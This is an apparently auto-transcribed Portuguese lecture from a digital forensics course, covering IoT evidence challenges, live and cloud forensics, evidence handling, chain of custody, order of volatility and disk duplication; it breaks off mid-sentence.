Então, boa noite a todos. Hoje vamos dar seguimento ao segundo módulo de computação forense. Hoje vai falar mais sobre as ferramentas utilizadas na computação forense e alguns procedimentos operacionais padrão. O nosso palestrante é o Marcos Lucas Pereira. Pode começar, Marcos. Está em suas mãos. Beleza? Boa noite, galera. Boa noite a todos aí. É um prazer estar aqui de novo com vocês. A gente hoje vai trabalhar um pouco mais sério, né? Sério, eu digo assim, mais operacional, mais ferramental, entendeu? Colocar a mão mais na massa. Não que a gente vai realizar algum procedimento aqui, porque não dá tempo, é mais demorado isso, mas eu vou passar umas ideias mais aprofundadas de como é que vocês conseguem já dar seus primeiros passos, entendeu? Dentro da perícia forense e já começar a realizar as suas perícias aí em cima de algum pendrive Eu recomendo um pendrive de 1 GB, porque geralmente essas paradas demoram. E como a máquina da gente não é. Da gente, eu digo a minha, a não ser a de vocês não é a melhor do mundo, você faz aí numa de 1 GB, um SSD de 500 MB, alguma coisa bem pequenininha, só para a gente ter uma ideia. Depois eu vou passar um site também, aonde tem kit, ferramenta, tem site para captura de bandeira, enfim, essas paradas todas, depois a gente vai dar uma olhada no final. Tá, computação forense e internet das coisas. Por que que eu deixei isso em segundo lugar hoje? Por que que eu deixei isso para falar hoje? Porque ontem, geralmente, pelo meu cálculo, já ia ser bem tarde, se eu fosse falar disso daqui. E aí eu falei, cara, como hoje em dia a IoT já está tomando conta de meio mundo de coisa, né? Já vem tomando conta aí IPv6 e etc. É uma parada que a gente precisa ficar atento. E é uma parada que precisa ser estudada pelos senhores, por mim, por todos que querem seguir na carreira de tecnologia, principalmente na área de redes e segurança. Como é que rola a perícia em cima da IoT? Né? Como é que isso acontece? Primeiramente, a gente precisa entender o que, que é a IoT, certo? O que, que é, da onde é que vem essa internet das coisas, o que, que é um objeto inteligente, o que, que é a rede conectada com todos os membros conectados dentro de um mesmo espaço. Tá lá. O que, que é um objeto inteligente? Ele é ser identificado, ou seja, deve ter um nome e um endereço na internet. O endereço IP, seja ele em PV6 e em PV4, mas tratando-se de IoT, ele vai ser propriamente dito em IPv6, um endereço único, cadastrado nele. Ele vai ter um nome. O nome dele pode ser um MAC, que também classifica ele como dispositivo único, ou então um nome de fabricação próprio dele, registrado ali na carcaça dele, que dá a ele uma como é que fala? Como é que eu posso dizer? Uma identificação única. Ter a capacidade de se comunicar com outros dispositivos. Sim, ele precisa enviar e receber informação. Ele precisa ter um servidor dentro dele, né? Um servidorzinho no qual eu recebo e fecho conexão com outro dispositivo. E ao mesmo tempo eu envio e esse dispositivo vai fechar a conexão e vai poder conversar comigo no esquema do handshake lá que eu falei, certo? Interação ao responder alguma das formas de interação ao responder de alguma forma as informações recebidas. Ou seja, ele vai ter que setar alguma flag. Opa, eu recebi, eu não recebi. Envia novamente. Eu vou fechar a conexão, certo? Essas paradas a gente já viu em PV6, no modelo OSI, e no modelo OSI não, no modelo TCP/IP, certo? Vocês vão conseguir entender melhor o que eu estou falando aqui sobre interação e resposta no modelo TCP/IP. Eu recomendo estudar. Lá tem as flags, a flag de acesso, a flag de finalização, enfim. Ter alguma capacidade básica de processamento. Sim, quando ele vai receber alguma informação, ele precisa processar isso e entregar para o usuário ou para a máquina que está solicitando alguma resposta, certo? Ele precisa entregar para o usuário alguma resposta, alguma coisa que vai fazer com que a interação continue ou finalize. Possuir algum sensor de fenômenos físicos, como velocidade, luz, calor, eletromagnetismo, radiação, entre outros. Por que o sensor?
porque ele precisa perceber ao seu redor o que está acontecendo para o fim específico dele, seja ele um termostato, seja ele um sensor de proximidade, e dar uma resposta para quem quer que seja, para uma máquina, para um servidor, ou para o próprio usuário que está requisitando aquela informação. Por isso que ele necessita ter um sensor incluso, embutido nele. Fonte de evidências. Tá. Evidências coletadas nos dispositivos inteligentes. Aí é o que rola. Por quê? Porque como ele é um dispositivo inteligente e ele não tem ele não tem muita interação humana, ele é um dispositivo que vai raciocinar por si só, né? Ele vai gerar log único, log dele, e aí é que começa a complicar um pouco mais as coisas. Por quê? Porque quando o perito for fazer a análise em cima daquilo, muitas das vezes vai ser uma perícia viva, porque aquele dispositivo ele não vai se desligar, entendeu? E se ele se desligar, talvez ele perca essas informações que estão ali dentro dele, certo? Evidências coletadas nas aplicações que fornecem comunicação entre os dispositivos inteligentes. Como assim? Tem um projeto que a Google fez, foi em 2018, eu acho, mas isso já é bem antigo, que eles falam que vai chegar um dia que a tecnologia e a internet vai ser tão comum que você não vai precisar mais baixar o aplicativo da Play Store, né? Ou da Apple Store, enfim. Vai ser executado tudo via rede. Você clicou, a sua velocidade de internet permite que você execute em tempo real, faça um streaming com aquele aplicativo sem precisar baixar ele na sua máquina. Mas e aí? O servidor local. Vai ter que ter um servidor local. Para local, eu digo, em qualquer lugar do planeta, mas ele vai ter que ser hospedado em algum lugar para rolar essa perícia. E aí é onde vem a questão da perícia online, entendeu? Vai ter muito essa parada de realizar uma perícia online num servidor, entendeu? Eu vou ter que abrir um terminal e coletar as informações de lá, sem que ocorra a mudança nas provas ou no log, sem que eu interfira naquela aplicação, e eu também preciso pensar como é que eu vou garantir o máximo êxito na minha recuperação de informações de evidência dentro daquela aplicação. Isso dificulta um pouco, porque nem sempre as empresas vão querer colaborar, certo? Às vezes ela vai se esconder atrás de uma lei ou outra de um país em questão, certo? Que protege, que fala, não, eu não vou entregar meus dados porque a lei do meu país fala que eu não posso violar a informação de terceiros que estão hospedados dentro do meu site. Então, do meu site eu digo do meu servidor. Então, com isso começa a dificultar um pouco a perícia nas aplicações. Mas, com o tempo, vai se alargando essa situação e aí você consegue um melhor desempenho. Evidências coletadas no armazenamento das informações, que normalmente correm na nuvem. É o que eu acabei de falar, entendeu? Como é que eu vou fazer uma coleta de uma parada que não existe, tecnicamente, aqui na minha máquina? É só uma interação que eu fiz. Ah, tem um log na minha máquina? Tem, mas eu posso excluir esse log, entendeu? Eu posso pegar um pendrive. Cadê? Eu acho que vai demorar um pouco. Eu posso pegar um pendrivezinho, subir um dispositivo, uma ferramenta nele, um Boa sistema noite, operacional. desculpa pelo atraso aí, perdi muito, Marcos. Não, começamos agorinha, professor. Começamos agorinha. Então, Fica beleza, tranquilo. eu tive um percalço aqui, não quero perder nada, não, beleza, falou. Hoje acaba às 9, né, Marcos? Talvez, vamos tentar. Beleza, um abração, pode continuar aí, meu amigo, bom trabalho aí. Beleza. E aí, aquela parada, como é que eu faço a coleta de informação num dispositivo que não está comigo? Entendeu? Tem uma distribuição, com licença, chamada Tails. Acho que é isso. Tails. Vamos lá. Esse cara aqui, né, ele roda num pendrive. Você grava ele num pendrive. Qualquer distribuição Linux, óbvio, roda num pendrive.
ela consegue rodar em modo live. Mas nem sempre você vai poder instalar alguma coisa nessa distribuição, nem sempre você vai poder usar aquilo como uma ferramenta para trabalho. Dito que eu preciso pensar em segurança agora. E aí eu pensando agora como um criminoso digital, essa ferramenta aqui, não que ela foi criada para esse fim, mas essa ferramenta aqui, quando eu queimo, gravo ela num pendrive, ela me possibilita ter um sistema operacional próprio, entendeu? E que eu posso usar em qualquer lan house, em qualquer lugar, que ele me permite ter ali uma conexão segura, certo? Via rede Tor, uma criptografia maior, eu posso ter um sistema de e-mail criptografado que me permite, às vezes, cometer meus crimes digital sem gerar rastro na rede. Eu gerei rastro, mas a partir do momento que eu tirei aquele pendrive, o único rastro que ficou foi na aplicação das nuvens. E aí? Se eu cometi um crime digital que está ali ligado a outro país, como é que eu consigo a solicitação do mandado de busca e apreensão? Por exemplo, tem um e-mail, tem um sistema de e-mail, é o... Caramba, esqueci. Protonmail, eu acho, se não me falha a memória. Ele é um sistema de e-mail que ele não tem, você não consegue solicitar os dados dos usuários de lá, porque a política deles os usuários que estão aqui dentro, que estão cadastrados, que pagam o meu serviço, eles querem discrição e eles querem confidencialidade. Então, independente da organização policial que for pedir essa quebra de sigilo, não vai ter, porque a lei do país onde está hospedado aquele servidor não permite a quebra de confidencialidade, de integridade, etc. Vamos lá. Evidências coletadas no meio de comunicação entre o hardware, as aplicações e o armazenamento. Wi-Fi, Bluetooth, Zigbee, 3G, 4G e agora o 5G. E aí? Por que eu coloquei isso daqui? Porque isso daqui, tecnicamente e especificamente, é o que rola em torno da IoT hoje. Por quê? Porque o intuito da IoT é todo mundo conectado, sem precisar estar tecnicamente conectado ali, entendeu? Preso. Eu vou trafegar ali por ondas, entendeu? Wi-Fi eu consigo conectar a minha casa toda com um roteador, e esse roteador eu consigo conectar minhas câmeras, minha luz inteligente, minha geladeira inteligente, meu ar-condicionado inteligente, e conseguir gerir isso tudo pela aplicação no meu telefone. Certo? Isso lá longe, entendeu? No outro lugar, no outro país, por exemplo, se eu conseguir uma conexão direta com o roteador com IP real, eu faço esse gerenciamento, por quê? Porque eu consigo enxergar aquele roteador na rede, entendeu? A conexão Bluetooth, hoje em dia, ela não é muito utilizada, certo? Você não vê mais a galera falando, vamos transferir uma música um para o outro aí via Bluetooth. Certo? Você não tem mais essa parada. Mas ainda assim faz parte, por quê? Porque alguns carros, alguns tipos de dispositivo ainda utilizam esse tipo de tecnologia, por exemplo, a caixinha de som da JBL é conectada via Bluetooth e etc. O Zigbee, eu vi falar dele uma... Opa, boa noite. Caramba, só lá dentro. Sabe o que usa muito Bluetooth? Sim. Maquininha de cartão. Verdade. Opa, valeu. Isso dá um gancho para uma ideia muito louca aqui. Eu vou trocar uma ideia com vocês daqui a pouco. Relaxa aí que nós vamos conversar. Valeu, cara. Eu tinha esquecido essa parada. Inclusive, eu acho que depois, se você, caramba, pudesse falar sobre a ideia que a gente discutiu esses dias para trás, com essa parada da maquininha de cartão em Bluetooth, eu acredito que você vai explicar melhor do que eu ainda, velho. O Zigbee, né, é um dispositivinho que ele é melhor do que o Raspberry Pi, né? Ele é utilizado para conexão e de conexão de rede. Se não me falha a memória, ele consegue alcançar 2 km. É isso, professor. O Diógenes entende disso muito melhor que eu. Professor? Ô, Marcos, eu não conheço muito o protocolo Zigbee. O Zigbee é o I3E 802.15, se eu não me engano, 4. Sim.
É o mesmo, um padrão parecido com o padrão do Bluetooth. Eu não conheço o Zigbee, eu tenho uma placa que o Armando me deu, na verdade duas placas, né? Não, eu tinha dado elas para o professor Lucas, para colocar elas para funcionar, para testar, mas eu nunca trabalhei, já trabalhei com Bluetooth bastante, né? Mas o Bluetooth não tem todo esse alcance, o alcance do Bluetooth é curto, é limitado aí a 5 metros, 10 metros dentro da casa, não mais do que isso. Na Universidade Federal, nós já utilizamos o Raspberry Pi junto com o Zigbee para fazer a transferência de dados da torre que a gente tem no Pantanal. Aí deu para usar mais ou menos por 7 quilômetros. Claro que depende da visada, potência, mas é bem interessante. É barato. Eu não sabia que o Zigbee alcançava isso tudo, não. Você precisa de uma antena específica, de ter potência, Sim. dimensionar bem o seu sistema, e tem que ser um lugar lá no Pantanal, né? Em que você tenha visada. Não, beleza, eu tinha visto essa distância, mas eu acredito que se colocar uma antena, você consegue ampliar a potência de sinal, dependendo da Em antena. distâncias menores, já utilizamos para fazer pequenos data loggers, né? Por exemplo, você quer colocar vários sensores em uma árvore, né? Isso a gente já fez, porque ele é mais barato, né, do que o Wi-Fi e o Bluetooth. A plaquinha dele é bem baratinha. E é compatível tanto com Arduino quanto com Raspberry Pi, numa boa. Legal, interessante. Beleza. Bom, muito obrigado aos senhores aí. Quem foi que falou aí que eu não vi o nome? Carlo? Ah, o Carmo. Muito obrigado, Carmo. Muito Carlo. obrigado. Carlo? Isso. Muito obrigado, Carlo, pelo adendo. Muito obrigado, professor Diógenes aí. Eu acredito que o Carlo também seja professor, né? Sim, eu oriento lá na física ambiental. Eu recebi esse convite por um grupo, mas não quero atrapalhar, não. Obrigado. Não, imagina, cara. Suas palavras foram de muita valia. Muito obrigado. Continuando, a questão da tecnologia 3G, 4G e agora 5G, que a galera tá brigando entre eles aí para ver quem é que vai colocar isso no mundo e tal, a China, com os Estados Unidos, tá uma guerra feia. Mas enfim, deixa eles brigar entre eles lá. Mas e aí, o que que isso tudo tem a ver com a computação forense em si? O Wi-Fi, Bluetooth, 3G e 4G ainda já é uma coisa que a computação forense já vem estudando há bastante tempo, já tem seus protocolos, seus métodos de recuperação de provas em cima disso, em cima dos logs, em cima das informações, ou então das vulnerabilidades, enfim, que vem acontecendo. Porém, a questão do Zigbee e do 5G ainda é uma parada nova, entendeu? É uma coisa que está surgindo agora. Entendeu? E junto com esse surgindo agora, vem a questão do usuário, porque o usuário em si ele vai utilizar para tarefas comuns, mas e o criminoso digital? Ele vai começar a pesquisar coisas em cima disso, né? Ele vai começar a pesquisar vulnerabilidades, ele vai fazer teste em cima daquilo até encontrar um meio de obter vantagem de maneira criminosa para poder realizar seus crimes. Seja ele de caráter público ou caráter privado. Um exemplo, como o professor aí falou, ele fez uma captura de dados do Pantanal para dentro da universidade. E se um cara mal intencionado fosse lá e nessa brincadeira colocasse uma terceira antena no meio, conseguisse um ataque man the middle, que é um ataque do homem no meio, e conseguisse falsificar e alterar os dados que o Zigbee estava transferindo para o servidor da universidade. O professor, certamente, iria colocar dados errados dentro do material dele e provavelmente isso, dependendo da situação, poderia gerir um prejuízo gigantesco para a universidade, para a imagem pública da universidade e, às vezes, um prejuízo também financeiro, tendo em vista que, às vezes, uma instituição privada está patrocinando aquela situação. Parou para pensar nisso? E aí, como é que eu consigo, depois dessa situação, descobrir o que aconteceu para esses dados terem sido alterados? Aí vem aquela coisa, foi falsificação de endereço? Foi um ataque de man-the-middle? E assim vai.
entendeu? O perigo começa aí. Esse é o trampo da inteligência, né, que começa agora a ser discernido no curso, que começa a ser raciocinado agora. A contra-inteligência, a inteligência começa aqui, entendeu? Como é que eu consigo agora pensar numa maneira de me proteger desse tipo de coisa, entendeu? Tá. Os desafios. Eu digo desafio porque a IoT ainda é uma coisa que, por mais que tenha crescido bastante, né, desde a época que ela foi proposta até os dias atuais, ainda tem desafio porque muita gente ainda gosta do IPv4, utiliza o IPv4 porque só aprendeu a mexer com o IPv4 e tem medo do IPv6, certo? E nessa brincadeira, deixa passar muita coisa. E principalmente os peritos forense, eles deveriam, ou devem, ter uma tentação maior sobre isso, porque vai chegar um dia que o IPv4 vai ser abandonado ali, vai ser descartado, ou vai ser deixado simplesmente para alguma situação em especial, né? Mas, vendo na questão de desafios em cima da IoT, coleta de evidências, sensores fixos. O que é um sensor? O que esse sensor gera? Como é que eu capturo as informações que esse sensor capturou ali? Será que esse sensor segura informações? Qual tipo de sensor que ele tem uma memória volátil ou não volátil? Será que esse sensor ele consegue ser autossuficiente e guardar as informações, mesmo que ele sofrer ali uma queda de eletricidade, ele conseguir segurar as informações ali por pelo menos 2 dias? Aí é uma questão, viu como é que começa a ficar difícil? Porque às vezes o cara sabe, ele sabe que o sensor daquele carro em especial, se desligado, é como se fosse uma memória RAM, uma parada volátil. Acabou. Então quer dizer que eu posso executar um ataque em cima daquele carro que os dados daquele sensor não vão servir para me incriminar. Entendeu? Aí é que rola aquele desafio para as empresas de comunicação que criam o sensor, como é que elas vão desenrolar isso ao decorrer da história, como diz o outro. E como é que a gente, como pesquisador dentro das universidades, principalmente a galera que mexe com engenharia e mecatrônica, como é que a gente vai começar a pensar a questão de log, entendeu? A questão de o que eu vou guardar dentro desse sensor para lá na frente eu poder extrair essas informações, seja ela para uma perícia ou seja ela para uma posterior análise de dado, entendeu? Sensores móveis. Presta atenção agora comigo, ó. Sensores fixos é uma parada que eu já, por exemplo, preguei ali na árvore e deixei ali, né, como o professor falou lá. Sensores móveis, sensor de um carro, sensor de um avião, ou drone, entendeu? Essas coisas assim que não ficam paradas por muito tempo, ela está sempre em movimento. Satélite. Como é que eu faço para extrair dado disso? Lógico que se esse sensor móvel, eu imagino que essa parada de sensor móvel, ele deva ter sim um sistema de processamento interno, diferente do sensor fixo, que às vezes ele não precisa, ele só precisa mandar dados enquanto ele tiver com eletricidade, mas o sensor móvel ele precisa estar sempre processando os dados e armazenando, porque em algum momento, se por um acaso ele cai a eletricidade dele, quando voltar a eletricidade, se às vezes ele está perdido em algum outro canto, ele precisa mandar um sinal de GPS para falar onde ele caiu. Um drone, por exemplo, certo? Mas ainda assim, pensando agora como perito, né, a nossa missão hoje, junto com a IoT que vem surgindo aí para a gente, né, seria começar a imaginar uma maneira de mitigar, entendeu? De mitigar essa situação de, às vezes, o sensor perder os dados que estão incluídos ali dentro dele, ou então deixar pelo menos uns 3 ou 4 dias os dados, e aí depois desse tempo, ser descartado de maneira inteligente, né? Dispositivo de comunicação. Todo dispositivo que emite sinal e que recebe sinal, ele é um dispositivo de comunicação, rádio, etc, etc, etc. Dentro da IoT, isso começa de novo a ficar mais complicado, porque na maioria das vezes o dispositivo de comunicação ele não tem uma memória que grava as informações
de acesso, recebimento, envio. Na maioria das vezes ele não tem. O provedor em nuvem. Essa é uma questão particular. Mas percebam que os 3 pontos de cima, o assunto é sempre o mesmo. Cabe a nós, peritos ou engenheiros ou alguma coisa, imaginar uma maneira, certo? Por que eu falo que é imaginar? Porque ainda está surgindo. Se você pesquisar hoje na internet perícia forense em cima de IoT, a galera vai publicar que a perícia forense em cima de dispositivos da internet das coisas ainda é utilizada conforme a perícia antiga, conforme a gente vai ver mais para frente daqui a pouco. A metodologia é mais ou menos a mesma e tal. Mas nem sempre surte efeito, porque na maioria das vezes os dados são voláteis, e etc, etc, etc. Se você pesquisar alguns artigos aí, você vai ver a galera falando só sobre isso. Aí, o que alguns pesquisadores, inclusive tem um indiano que propôs? Ele falou, então, cabe a gente, é o que eu estou falando, cabe a gente começar a imaginar dispositivos inteligentes, mas que essa inteligência não fique só quando estiver passando eletricidade ali. Essa inteligência continue depois, entendeu? Essa IA continue sempre. E se por um acaso cair a eletricidade e esse dispositivo morrer, ele ainda continue ali armazenando os dados para que, se por um acaso acontecer um crime digital, uma invasão, alguma coisa, ele ter como devolver os dados ao investigador e assim conseguir suprir a investigação. E os provedores em nuvem é aquela parada, né? Às vezes o provedor está lá na China e o ataque aconteceu aqui no Brasil. O perito vai daqui na China só para pegar o disco rígido lá e espetar um cabo e tirar as informações. É meio complicado, né? E aí é que onde começa a ver a perícia online, entendeu? Que inclusive tem uma distribuição que a gente vai falar sobre ela, a CSI Linux, ela veio com o intuito de suprir essa necessidade, entendeu? Ela tem 2 máquinas, uma é a principal, 3 na verdade, mas o que interessa para nós é só 2. A primeira, principal, a segunda ela serve como um gateway. É ela que faz o acesso à internet e é ela que entrega a conexão para a primeira máquina para você poder fazer aí os seus trabalhos. Por quê? Para você não sofrer ali um ataque de shell reverse quando estiver tentando fazer uma conexão dentro do servidor. E nessa questão de perícia online, você vai fazer um ataque, ou você vai fazer uma conexão no servidor, por SSH ou por qualquer outro meio de conexão que você tiver no momento, extrair as informações sem que os dados, os logs e etc. do servidor sejam alterados. E aí é que começa uma questão mais difícil. Por quê? Porque o conhecimento técnico que você vai ter que ter sobre aquela tecnologia vai ter que ser muito sólido. Não vai ser só digitar ali um comando, não, eu preciso recuperar um arquivo, clica next, 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 finish com a ferramentinha e ela já te dá os arquivos de volta. Como, por exemplo, o Recueva no Windows, aquele Get Databack, enfim, essas ferramentas que é só dar um next, next, finish, ela recupera os dados. Já é mais diferenciada a situação. Você tem que saber aonde é que está o log, você tem que saber qual arquivo você vai buscar, você tem que saber os comandos corretos para não gerar uma interferência no servidor e às vezes gerar ali uma quebra no tráfego, um prejuízo para a empresa. Então, os desafios são muitos, certo? E agora, mais que nunca, a gente vai ter que estudar dobrado. Se a gente já estudou até hoje o que estudou, eu falo pelos outros, eu estou começando a estudar agora. As pessoas que já estudaram muito vão ter que estudar 2 vezes mais, porque com esse âmbito da IoT, quem quer seguir nessa área tem que ter ciência de que todo dia vai surgir uma parada nova e a parada vai ser totalmente diferente do que a gente já viu. Agora, é o que eu estava falando sobre a metodologia clássica, certo? Essa metodologia ela foi criada, se não me falha a memória, em 2002, certo? Por um cara chamado Garfinkel. Ele tem um artigo publicado em cima dessa metodologia aqui. Se não me engano, naquela pasta que eu compartilhei de Drive com os artigos que eu tinha, tem um artigo dele, vocês podem conferir lá. Ao todo, são acho que 3 artigos defendendo 3 metodologias diferentes, mas as 3 metodologias diferentes apontam para o artigo desse cara, certo? Os 3 peritos que escreveram metodologias diferentes e tal, apontam para o artigo desse cara. Vamos lá. Métodos, coleta de dados.
Aí é onde já eu cheguei no local do crime, aí é onde eu vou começar a identificar aqueles ativos que vai me gerar uma prova, uma evidência, que a gente discutiu na aula passada. Isolar a área. Eu vou isolar aquele lugar ali e falar, ó, aqui é uma área de crime computacional, ninguém mexe sem que eu dê a ordem, porque senão pode ser que ocorra a perca de dados. Coletar evidências. Eu vejo o que é importante para a investigação, coleto, lacro e mando. Garantir a integridade. Como assim a integridade? É aquela coisa, eu vou garantir que no usuário não vai fazer uma interação com a máquina, as outras autoridades da lei, se ela estiver ligada, e ao mesmo tempo eu também vou garantir a integridade do dado, colocando, por exemplo, um HD de maneira correta dentro do plástico espuma, para que quando ele for coletado e enviado para o laboratório, ele não sofra nenhum dano por alguma queda, alguma coisa. Identificar equipamentos. Novamente, esse coletar evidências e identificar equipamentos está mais ou menos atrelado, certo? Qual crime aconteceu aqui? Foi um crime de estelionatário. Opa! Impressora, o HD do cara, pendrive, CD, DVD, câmera, que às vezes ele usou para fotografar alguma nota, alguma coisa, entendeu? Impressora 3D, certo? E aí, esse tipo de equipamento é interessante levar. E isso eu estou falando de maneira genérica. Aí você já começa a pensar mais amplamente. Embalar evidências. Tem o jeito certo de embalar as coisas, certo? Um pendrive, uma caixinha. Geralmente tem uma caixinha que ela não recebe nenhum tipo de eletromagnetismo. Você coloca lá os pendrives, lacrou, passou a fita, colou a etiquetinha da evidência, documentou, mandou. O SD e o CD-DVD também tem a sua maneira correta da bolsinha de colocar, certo? O disquete está ali porque, assim, por mais que seja uma tecnologia que a gente não vê hoje em dia, mas ainda existe. E seria uma sacada muito grande, às vezes, o cara colocar lá um arquivo de 2 MB num disquete, e aí o cara, é só um disquete, deixa passar. E às vezes o arquivo mais importante para o cara é uma planilha. Uma planilha com todos os dados do cara lá, do crime organizado dele. E aí? Com os contatos, com as contas e tal. Tava dentro de um disquete lá jogado no canto. E aí você deixou passar porque você achou que o cara não fosse esperto o suficiente para colocar aquilo no disquete. Mas é interessante às vezes checar. A HD portátil e o HD. O HD portátil, geralmente ele já tem a proteçãozinha dele, mas ainda continua a mesma coisa. Colocou dentro do plástico espuma, plástico bolha, isolou, etiquetou e mandou para o laboratório. Etiquetar evidências, é o que eu falei, você coloca a numeração e na planilha de relação de evidência você coloca lá, ó, item tal, marca tal, contém dado tal e etc, etc, etc. E aí provavelmente pode trazer um benefício para a resolução do crime. É interessante documentar. E a cadeia de custódia já é a questão mais correta da documentação, é onde você vai falar o que foi preso, o que foi coletado, o que está sendo enviado, a situação que está e como é que deve ser manuseado aquele tipo de coisa. E agora uma parada muito séria, a ordem de volatilidade, porque hoje em dia, por exemplo, ontem o cara perguntou, e se eu continuar, e se eu manter a memória RAM aquecida, eu consigo manter os dados? Não, porque para mim manter um dispositivo volátil com os dados presentes nele, eu preciso estar passando eletricidade por ele, certo? Eu não posso interromper a eletricidade que está passando por ele. Então vamos ali, ó, acompanhando a setinha de cima para baixo. Memória RAM, processo em execução. Por que primeiramente a memória RAM? Porque na memória RAM, eu vou ter ali a memória compartilhada, o cache, o buffer, enfim, vai estar tudo ali. Eu fiz o dump de memória, beleza, eu vou para o processo de execução. Por que os processos de execução? Porque quando eu vejo os processos de execução, geralmente são arquivos de log. E arquivo de log é salvo no disco rígido, certo? Ele é salvo no HD, ele fica guardado lá. Conexões e estado de rede é um arquivo de log e ele vai ficar salvo no disco rígido. Arquivos de log. Perceba, além dos dois que eu acabei de comentar, às vezes se você vê um arquivo de log para ver que dispositivo foi espetado naquela máquina, se foi um HD,
se foi um pendrive, qual foi o número de série daquele dispositivo, o ID que fala, certo? Ou o que esse usuário estava fazendo naquele momento, que pasta ele abriu, se ele pediu permissão de root, vai estar tudo dentro do arquivo de log, certo? Disco rígido. Por último assim, nessa questão de memória RAM até disco rígido, vamos colocar ele como um último item aqui nesse ponto. Por quê? Porque se eu desligar a máquina, o disco rígido vai, se eu desligar de maneira correta, sem bater agulha, sem nada, ele ainda vai estar lá intacto. E mesmo se bater agulha e se travar, eu consigo mandar para uma especializada e eles conseguem fazer a abertura, a recuperação dos dados de maneira mais inteligente. Mas vamos pensar num cenário perfeito onde não tem uma batida de agulha e uma riscagem do disco. Eu consigo extrair as informações do disco com ele desligado, eu posso clonar, enfim, posso realizar todas as perícias em cima dele ali. Tenho duas desses. Eita, que ódio, tá. Mídias removíveis. Pendrive, HD externo, CD, DVD, disquete, SD, tudo isso é considerado mídia removível. Então, se ela é removível, tudo bem, eu posso tirar o pendrive e ele vai ficar salvo. A menos que, perceba, às vezes, o computador do cara, ele tá ligado com o pendrivezinho rodando o sistema operacional em modo live. E aí, como é que fica a parada? Porque se eu tiro, aquele modo live cai e eu perco todos os dados que estão lá dentro. Por exemplo, um Tails da vida. Ele não vai salvar a sessão. Um Linux Lite, um Mint, um Ubuntu, um Debian, ele não vai salvar a sessão. Ele está em modo live. Tirou o pendrive e acabou. Ele volta para o estado normal, o estado inicial dele. Não tem log e não tem nada. E aí? Então, às vezes é interessante você se atentar e perceber se o sistema operacional que está rodando ele está no próprio disco rígido ou se ele está em modo live. É interessante checar isso daí antes de desligar ou de tirar o pendrive ali de maneira apressada. Outros dispositivos, câmeras, GPS, entre outros, que não seria, no caso, impressora e tal. Isso daí é só numa questão específica, se realmente o crime estiver apontando para aquele tipo de equipamento. Senão, não tem por que ficar lotando o seu laboratório com um monte de equipamento inútil lá. Perícia forense digital, métodos, exame de dados. É onde eu vou começar a analisar os dados que eu obtive. Identificar, extrair, filtrar e documentar, certo? Eu vou identificar, esse crime foi sobre clonagem de cartão de crédito. Eu vou identificar os possíveis equipamentos e possíveis dados ali que estejam relacionados com isso. Aí eu vou extrair essas informações. Eu vou filtrar ainda mais ali, ó, filtrar. Depois de extrair, depois que eu identifiquei, eu vou extrair e aí eu vou começar a filtrar essas informações para perceber o que vai ser interessante eu documentar. Entendeu? O que vai ser interessante eu colocar lá, não. Foi dito que no dia tal, no momento tal, fulano de tal, ele teve, ele realizou com êxito, né, a transferência e tal, de dinheiro tal para conta tal, isso presente no log tal, isso comprova que o crime aconteceu. Ou então, no momento tal, do dia tal, foi comprovado por fotografia, por arquivo de fotografia encontrado no dispositivo de armazenamento do suspeito, que o mesmo tinha fotografias de cartão de crédito, entendeu? Claro que na hora de redigir o laudo vai ser mais bonitinho e tal, mas é só para vocês terem uma ideia de como funciona. Primeiro, eu identifico a possível situação que vai me gerar uma prova, eu vou extrair essa informação, e aí eu vou analisar, eu vou estudar, e eu vou filtrar o que daquela informação é importante para mim ter um conhecimento. Dado, informação, conhecimento. Lembra lá no primeiro módulo? Pois bem, e aí depois que eu tenho esse conhecimento, que eu tenho essa ciência, que eu tenho essa inteligência do que aconteceu, aí eu vou documentar e apresentar para as autoridades. Duplicação. Eu reservei um slide em especial para esse tipo de situação, porque na maioria das vezes pode acontecer de você perder os dados ali por queda de eletricidade, porque o HD corrompeu e papapá, enfim, os motivos são N motivos, são finitos, porém não são poucos. Quem tem um, não tem nada, porque às vezes você só tem um pendrive, e aí ele queima,
Você não tem mais nada. Quem tem dois, tem um. Se você tem duas mídias ali removíveis, enfim, que você fez a clonagem de uma na outra. Se uma queimou, você só tem uma. Você não tem as duas. Quem tem três, tem dois. E embaixo, trabalhe sempre com a cópia da cópia. Como assim? Eu peguei o HD do cara, do criminoso, clonei, fiz uma clonagem bit a bit. Eu vou pegar essa clonagem, vou guardar. Eu vou fazer uma segunda cópia daquele HD? Não, eu vou fazer uma cópia da cópia que eu fiz. Beleza? Ah, mas eu quero fazer uma cópia do HD. Pode ser que no momento que você realizar uma segunda cópia daquele HD, a cópia saia de maneira diferente. Porque, por algum motivo na informática, as coisas nem sempre saem do jeito que a gente quer que saia. É uma coisa muito louca, mas é. Às vezes, por conta de um cabo de rede, seu computador não liga. Então, seguindo esse princípio de que nem tudo é o que parece, fez uma cópia, deu certo, faz uma cópia daquela cópia que você realizou de primeiro. Duas cópias e o HD original guardadinho lá. Porque se por um acaso você perder as duas cópias, que eu acho bem difícil, você ainda tem um HD para você suprir a necessidade numa eventual situação de emergência. Métodos, a análise das informações, identificar. O que eu vou identificar? Aí vai de novo, o que cabe para o crime, certo? O que vai caber para mim utilizar como prova para poder finalizar a investigação. Pessoa, local, evento. Por que é interessante identificar pessoas? Porque às vezes os contatos daquele criminoso, daquele possível criminoso, eles vão me ligar a uma outra situação, uma outra organização criminosa ou a um outro ponto de crime, enfim. E às vezes é interessante eu me atentar a essa situação. Locais, aonde foi que ele esteve, por que ele estava lá, com quem que ele conversou lá, o que ele foi fazer lá, a hora que ele estava lá, entendeu? Às vezes o GPS entrega muita coisa, às vezes o telefone com a localidade que ele passa de torre em torre, você consegue triangular a situação e perceber, opa, mas é incomum ele estar fazendo esse tipo de situação, é incomum ele estar tendo esse tipo de comportamento. Foi incomum ele ir naquele lugar, entendeu? Evento, o que aconteceu? O que esse cara fez na máquina durante esse meio tempo, entendeu? Porque aí eu ainda conversei com vocês sobre lugares, né? Eu acho que a maioria entendeu assim, lugares físicos, mas em locais de rede, locais, site mesmo. O que ele foi fazer naquele determinado site naquela hora daquele dia? Quantas vezes ele visitou aquele site? Quantas vezes ele clicou naquele mesmo link? Quantas vezes ele acessou uma guia com o título, como é que fala? Acesso restrito, entendeu? E o que ele foi fazer lá? Quais os eventos que aconteceram depois que ele realizou esse tipo de coisa? São perguntas que às vezes você tem que ir já com ela na mente, porque às vezes a resposta já está ali direto. Correlacionar pessoas, locais e evento. Ele conversou com tal pessoa no chat, depois ele acessou tal site e aconteceu tal evento. Isso tá ligado? Tá. Por que isso tá ligado? Bom, por isso. Na sua investigação você vai ter essa 